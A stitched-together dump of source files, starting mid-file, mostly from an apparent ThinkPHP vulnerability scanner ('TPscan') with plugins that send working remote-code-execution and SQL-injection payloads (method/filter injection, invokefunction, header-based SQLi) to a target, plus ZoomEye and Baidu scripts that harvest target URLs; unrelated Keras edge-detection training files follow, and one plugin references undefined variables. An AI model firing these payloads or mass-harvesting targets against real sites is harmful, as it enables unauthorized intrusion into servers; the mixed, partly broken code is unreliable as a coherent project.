"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~print_r(md5(2333))}]')
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
timenow = datetime.datetime.now().strftime("%Y_%m_%d")[2:]
vurl2 = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C{0}.log'.format(timenow))
req2 = requests.get(vurl2, headers=headers, timeout=15, verify=False)
if r"56540676a129760a3" in req2.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a3 found'
pocdict['response'] = req2.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_index_construct_rce.py
|
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_index_construct_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_index_construct_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent": 'TPscan',
"Content-Type": "application/x-www-form-urlencoded",
}
payload = 's=4e5e5d7364f443e28fbf0d3ae744a59a&_method=__construct&method&filter[]=print_r'
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=index/index/index')
req = requests.post(vurl, data=payload, headers=headers, timeout=15, verify=False)
if r"4e5e5d7364f443e28fbf0d3ae744a59a" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '4e5e5d7364f443e28fbf0d3ae744a59a'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/TPscan.py
|
#!/usr/bin/env python
# coding=utf-8
from gevent import monkey;monkey.patch_all()
from gevent.pool import Pool
from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify
from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify
from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify
from plugins.thinkphp_debug_index_ids_sqli import thinkphp_debug_index_ids_sqli_verify
from plugins.thinkphp_driver_display_rce import thinkphp_driver_display_rce_verify
from plugins.thinkphp_index_construct_rce import thinkphp_index_construct_rce_verify
from plugins.thinkphp_index_showid_rce import thinkphp_index_showid_rce_verify
from plugins.thinkphp_invoke_func_code_exec import thinkphp_invoke_func_code_exec_verify
from plugins.thinkphp_lite_code_exec import thinkphp_lite_code_exec_verify
from plugins.thinkphp_method_filter_code_exec import thinkphp_method_filter_code_exec_verify
from plugins.thinkphp_multi_sql_leak import thinkphp_multi_sql_leak_verify
from plugins.thinkphp_pay_orderid_sqli import thinkphp_pay_orderid_sqli_verify
from plugins.thinkphp_request_input_rce import thinkphp_request_input_rce_verify
from plugins.thinkphp_view_recent_xff_sqli import thinkphp_view_recent_xff_sqli_verify
import sys
import gevent
print('''
___________
|_ _| ___ \
| | | |_/ /__ ___ __ _ _ __
| | | __/ __|/ __/ _` | '_ \
| | | | \__ \ (_| (_| | | | |
\_/ \_| |___/\___\__,_|_| |_|
code by Lucifer
''')
targeturl = input("[*]Give me a target: ")
if targeturl.find('http') == -1:
exit(1)
poclist = [
'thinkphp_checkcode_time_sqli_verify("{0}")'.format(targeturl),
'thinkphp_construct_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_construct_debug_rce_verify("{0}")'.format(targeturl),
'thinkphp_debug_index_ids_sqli_verify("{0}")'.format(targeturl),
'thinkphp_driver_display_rce_verify("{0}")'.format(targeturl),
'thinkphp_index_construct_rce_verify("{0}")'.format(targeturl),
'thinkphp_index_showid_rce_verify("{0}")'.format(targeturl),
'thinkphp_invoke_func_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_lite_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_method_filter_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_multi_sql_leak_verify("{0}")'.format(targeturl),
'thinkphp_pay_orderid_sqli_verify("{0}")'.format(targeturl),
'thinkphp_request_input_rce_verify("{0}")'.format(targeturl),
'thinkphp_view_recent_xff_sqli_verify("{0}")'.format(targeturl),
]
def pocexec(pocstr):
exec(pocstr)
gevent.sleep(0)
pool = Pool(10)
threads = [pool.spawn(pocexec, item) for item in poclist]
gevent.joinall(threads)
|
jun-test/super-guacamole
|
zoomeye.py
|
<gh_stars>1-10
import requests
import json
import sys
def login():
url_login='https://api.zoomeye.org/user/login'
data={
"username": "你的账号",
"password": "<PASSWORD>"
}
data = json.dumps(data) #把上面数据转换为json格式
r=requests.post(url=url_login,data=data) #获取到access_token
return(json.loads(r.content)['access_token'])#取出access_token值
def main(keyword):
url='https://api.zoomeye.org/host/search?query=%s'%(keyword)
headers={'Authorization':'JWT '+login()}
r=requests.get(url=url,headers=headers)
datas=json.loads(r.content)['matches']#把json格式转换为普通格式
# print(datas)
for data in datas:
print(data['portinfo']['service']+'://'+data['ip']+':'+str(data['portinfo']['port']))
with open('ip.txt','a+',encoding='utf8') as f:
f.write(data['portinfo']['service']+'://'+data['ip']+':'+str(data['portinfo']['port'])+'\n')
if __name__ =='__main__':
print('''*Atuhor : tdcoming.
''')
if len(sys.argv)!=2:
print('enter:python %s keyword'%sys.argv[0])
sys.exit(-1)
else:
main(sys.argv[1])
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_request_input_rce.py
|
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_request_input_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_request_input_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\Request/input&filter=var_dump&data=f7e0b956540676a129760a3eae309294')
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760a" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_view_recent_xff_sqli.py
|
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_view_recent_xff_sqli_verify(url):
pocdict = {
"vulnname":"thinkphp_view_recent_xff_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
"X-Forwarded-For" : "1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#"
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=/home/article/view_recent/name/1')
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760a" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
BaiDuSpider.py
|
<filename>BaiDuSpider.py
#-*_coding:utf8-*-
from bs4 import BeautifulSoup
import requests
import re
import sys
import queue
import threading
hea={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Accept-Language' : 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Connection' : 'keep-alive',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'X-Forwarded-For':'192.168.127.12'}
class BaiduSpider(threading.Thread):
"""docstring for BaiduSpider"""
def __init__(self, q):
threading.Thread.__init__(self)
self.q = q
def run(self):
while not self.q.empty():
url=self.q.get()
try:
self.spider(url)
except Exception as e:
print(e)
pass
def spider(self,url):
r = requests.get(url=url,headers=hea).content
soup = BeautifulSoup(r,'lxml')
urls=soup.find_all(name='a',attrs={'data-click':re.compile('.'),'class':None})
for url in urls:
r_get_url = requests.get(url=url['href'],headers=hea,timeout=8)
if r_get_url.status_code==200:
print(r_get_url.url)
with open('url.txt','a+') as f:
f.write(r_get_url.url+'\n')
f.close
def main(keyword):
q=queue.Queue()
for i in range(0,760,10):# #wd是控制的参数,每一页pn加10,最大页码为750
q.put('https://www.baidu.com/s?wd=%s&pn=%s'%(keyword,str(i)))
threads = []
threads_count=20
for t in range(threads_count):
threads.append(BaiduSpider(q))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
print('''
*Made by :tdcoming
*QQ Group :256998718
*For More :https://t.zsxq.com/Ai2rj6E
*MY Heart :https://t.zsxq.com/A2FQFMN
_______ _ _
|__ __| | | (_)
| | __| | ___ ___ _ __ ___ _ _ __ __ _
| | / _` | / __|/ _ \ | '_ ` _ \ | || '_ \ / _` |
| || (_| || (__| (_) || | | | | || || | | || (_| |
|_| \__,_| \___|\___/ |_| |_| |_||_||_| |_| \__, |
__/ |
|___/
''')
if len(sys.argv) !=2:
print('>>>>>>>>>>>Enter:%s keword<<<<<<<<<<<<<<'%sys.argv[0])
sys.exit(-1)
else:
main(sys.argv[1])
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_invoke_func_code_exec.py
|
#!/usr/bin/env python
# coding=utf-8
import re
import urllib
import requests
def thinkphp_invoke_func_code_exec_verify(url):
pocdict = {
"vulnname":"thinkphp_invoke_func_code_exec",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
}
controllers = list()
req = requests.get(url, headers=headers, timeout=15, verify=False)
pattern = '<a[\\s+]href="/[A-Za-z]+'
matches = re.findall(pattern, req.text)
for match in matches:
controllers.append(match.split('/')[1])
controllers.append('index')
controllers = list(set(controllers))
for controller in controllers:
try:
payload = 'index.php?s={0}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333'.format(controller)
vurl = urllib.parse.urljoin(url, payload)
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760a3" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_construct_debug_rce.py
|
<reponame>jun-test/super-guacamole<gh_stars>1-10
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_construct_debug_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_construct_debug_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : "TPscan",
}
payload = {
'_method':'__construct',
'filter[]':'print_r',
'server[REQUEST_METHOD]':'56540676a129760a3',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php')
req = requests.post(vurl, data=payload, cookies=cookies, headers=headers, timeout=15, verify=False, proxies=proxy)
if r"56540676a129760a3" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
sarojit2018/Deep-Edges
|
model.py
|
<filename>model.py<gh_stars>0
import numpy as np
import os
import skimage.io as io
import skimage.transform as trans
import numpy as np
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras import backend as keras
from keras import backend as K
from losses import *
#Handmade - PSPNet
def deepEdge(input_size = (512,512,3), training = True):
#conv nets for unsupervised feature extraction
inputs = Input(input_size)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)
#Pooling Module
#We will use pooling sizes = 2,4,8,16,32
#Bin1 pooling size = 2
bin1 = MaxPooling2D(pool_size=(2, 2))(conv1)
flat_bin1 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin1)
#Bin2 pooling size = 4
bin2 = MaxPooling2D(pool_size=(4, 4))(conv1)
flat_bin2 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin2)
#Bin3 pooling size = 8
bin3 = MaxPooling2D(pool_size=(8, 8))(conv1)
flat_bin3 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin3)
#Bin4 pooling size = 16
bin4 = MaxPooling2D(pool_size=(16, 16))(conv1)
flat_bin4 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin4)
#Bin5 pooling size = 32
bin5 = MaxPooling2D(pool_size=(32, 32))(conv1)
flat_bin5 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin5)
#Upsample each flattened bins to match the size equal to the original input size
up_bin1 = UpSampling2D(size = (2,2))(flat_bin1)
up_bin2 = UpSampling2D(size = (4,4))(flat_bin2)
up_bin3 = UpSampling2D(size = (8,8))(flat_bin3)
up_bin4 = UpSampling2D(size = (16,16))(flat_bin4)
up_bin5 = UpSampling2D(size = (32,32))(flat_bin5)
#Merge upsampled layers together one after the other along with the unsupervised feature extraction layer
merged_layers = concatenate([conv1,up_bin1], axis = 3)
merged_layers = concatenate([merged_layers,up_bin2], axis = 3)
merged_layers = concatenate([merged_layers,up_bin3], axis = 3)
merged_layers = concatenate([merged_layers,up_bin4], axis = 3)
merged_layers = concatenate([merged_layers,up_bin5], axis = 3)
#Finally generate the binary mask
binary_masks = Conv2D(1, 1, activation = 'sigmoid')(merged_layers)
model = Model(inputs = inputs, outputs = binary_masks)
model.compile(optimizer = Adam(lr = 1e-7), loss = dice_coef_loss, metrics = ['accuracy'])
return model
|
sarojit2018/Deep-Edges
|
trainer.py
|
<reponame>sarojit2018/Deep-Edges<filename>trainer.py<gh_stars>0
from dataloader import *
from model import deepEdge
import tensorflow as tf
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras import backend as keras
import os
#Instantiate the model
model = deepEdge()
version = 1 #Version number
model_name = 'deepEdge_best_val_loss_v1.hdf5'
start_from_scratch = False
if not start_from_scratch:
if os.path.exists(model_name):
print("Model Exists! Resuming fine tuning")
try:
model.load_weights('./deepEdge_best_val_loss_v1.hdf5')
except:
print("Error Loading model: Can happen in the event of a change in model arch/file getting corrupt!")
print("Starting from scratch")
else:
print("Given version model does not exists, starting from scratch")
num_training_samples = 240
batch_size = 10
steps_per_epoch = 40
num_epochs = 1000
checkpoint_filepath = './'
model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_filepath,
save_weights_only=True,
monitor='val_loss',
mode='min',
save_best_only=True)
model_checkpoint = ModelCheckpoint(model_name, monitor='val_loss', verbose=1, save_best_only=True)
model.fit(datastreamer_BIPED(), steps_per_epoch=steps_per_epoch,epochs=num_epochs,validation_data = datastreamer_BIPED(mode = 'test'),validation_steps = 1, callbacks = [model_checkpoint])
model.save('deepEdge_end_of_training.h5', model)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.